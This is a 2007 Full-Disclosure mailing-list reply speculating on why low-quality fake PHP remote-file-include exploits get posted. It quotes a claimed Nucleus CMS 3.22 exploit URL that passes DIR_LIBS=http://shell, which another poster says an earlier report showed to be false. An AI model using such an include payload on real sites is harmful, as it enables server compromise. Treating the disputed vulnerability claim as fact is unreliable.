lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Date: Mon, 7 May 2007 14:12:49 -0400
From: "Ron Superior" <rsuperior@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: nucleus 3.22 >> RFI

Hi folks,

  Some months back I seem to remember people hypothesizing as to the
real purpose behind some of these particularly lame fake PHP exploits.
 You know the ones I mean; they're mostly remote file includes, they
often are decorated with some simple ASCII art, and the "thanks" and
"greetz" sections are always loaded with names that suggest Turkish or
other Middle Eastern origin.

  The two most interesting suggestions that I recall were:

  1) Somebody wanted to pump up the lists with PHP exploits so they
could claim later that some large number X of PHP vulnerabilities had
been posted to FD since some date.

  2) Covert communication, or that the "exploits" were really secret
messages between t3rr0ri$ts or something.

  I'm sure there exists a motive beyond just spamming us to be
annoying.  Any one have any new ideas, or good arguments for either of
the above two ideas?

    Ron

Guasconi Vincent wrote:
> On 5/6/07, security curmudgeon <jericho@...rition.org> wrote:
>> : VENDOR :http://nucleuscms.org/
>> : BY : s3rv3r_hack3r (hackerz.ir admin)
>> : bug:
>> : nucleus3.22/nucleus/plugins/skinfiles/index.php       =
include($DIR_LIBS . 'PLUGINADMIN.php');
>> : Exloit:
>> : http://victim/nucleus/plugins/skinfiles/index.php?DIR_LIBS=http://shell
>>
>> I haven't examined the source code to this, but on June 16, 2006,
>> gamr-14@...mail.com disclosed RFI vulnerabilities [1] in four Nucleus
>> scripts, all with the DIR_LIBS variable as the injection point. This was
>> subsequently proven to be a false report as the variable was previously
>> set and could not be manipulated by an attacker.
>>
>> Have you actually tested this, or is this based on a quick grep of the
>> source code?
>
> They're like bots now.
> They didn't hear you, and you can't stop them.
>
> Try a spam rule.
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ